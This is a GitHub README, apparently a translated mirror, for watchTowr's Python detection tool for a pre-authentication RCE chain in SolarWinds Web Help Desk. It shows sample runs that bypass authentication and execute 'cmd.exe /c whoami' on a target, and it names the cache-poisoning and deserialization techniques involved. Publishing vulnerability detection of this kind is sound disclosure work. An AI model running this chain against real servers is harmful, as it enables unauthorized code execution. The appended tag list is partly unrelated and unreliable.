watchtowrlabs/watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553
GitHub: watchtowrlabs/watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553
针对SolarWinds Web Help Desk认证前RCE漏洞链(CVE-2025-40552/40553)的Python检测验证工具。
Stars: 4 | Forks: 0
# CVE-2025-40552 和 CVE-2025-40553 SolarWinds Web Help Desk Pre-Auth RCE Chain
SolarWinds Web Help Desk Pre-Auth RCE Chain 检测工件生成器工具
# 描述
此检测工件生成器用于验证 SolarWinds Web Help Desk 实例是否存在 CVE-2025-40552 和 CVE-2025-40553 漏洞。
检测工件生成器尝试执行两个操作:
* 利用 CVE-2025-40552 绕过身份验证 - 此检查非常准确。
* 如果成功,它会尝试通过执行 `cmd.exe /c whoami` 命令来验证 CVE-2025-40553 RCE - 此检查并非 100% 准确,因为它依赖于可能因环境而异的错误消息。
**注意** - 在 RCE 测试期间,脚本将在 `postgres` 数据库中创建 `SWWHDDAG` 表。
测试结束后,您可以验证命令输出是否存在于数据库中:
```
> SELECT * FROM public.swwhddagmm2t6t79
"output"
"nt authoritysystem"
```
# 检测实战
针对易受攻击实例的测试:
```
$ python3 watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py -H https://vulnerable.lab:8443
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py
(*) CVE-2025-40552 + CVE-2025-40553 Pre-Auth RCE Chain in SolarWinds Web Help Desk - Detection Artifact Generator
- Piotr Bazydlo (@chudyPB) of watchTowr
CVEs: CVE-2025-40552 and CVE-2025-40553
[+] Testing CVE-2025-40552 Authentication Bypass
[+] Triggering error and poisoning context cache with LookAndFeelPref
[+] VULNERABLE to CVE-2025-40552 Authentication Bypass
[+] Testing CVE-2025-40553 RCE
[+] This stage will create SWWHDDAGp08zwfs6 DB table if successful
[+] Verifying deserialization and serialization of org.apache.commons.dbcp2.BasicDataSource
[+] PROBABLY VULNERABLE: Connection validated and SQL queries can be executed
[+] Executing "cmd.exe /c whoami" - verify locally if it worked
```
针对非易受攻击实例的测试:
```
$ python3 watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py -H https://notvulnerable.lab:8443
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py
(*) CVE-2025-40552 + CVE-2025-40553 Pre-Auth RCE Chain in SolarWinds Web Help Desk - Detection Artifact Generator
- Piotr Bazydlo (@chudyPB) of watchTowr
CVEs: CVE-2025-40552 and CVE-2025-40553
[+] Testing CVE-2025-40552 Authentication Bypass
[+] Triggering error and poisoning context cache with LookAndFeelPref
[-] NOT VULNERABLE to CVE-2025-40552, exiting
```
# 受影响版本
`< SolarWinds Web Help Desk 2026.1`
参考链接:https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
# 关注 [watchTowr](https://watchTowr.com) Labs
获取最新的安全研究动态,请关注 [watchTowr](https://watchTowr.com) Labs 团队
- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
标签:CISA项目, CVE-2025-40552, CVE-2025-40553, Java反序列化, POC验证, PostgreSQL, RCE, SolarWinds, Web Help Desk, Web报告查看器, 服务器监控, 测试用例, 消息认证码, 漏洞利用链, 编程工具, 网络安全, 身份验证绕过, 远程代码执行, 逆向工具, 隐私保护, 预认证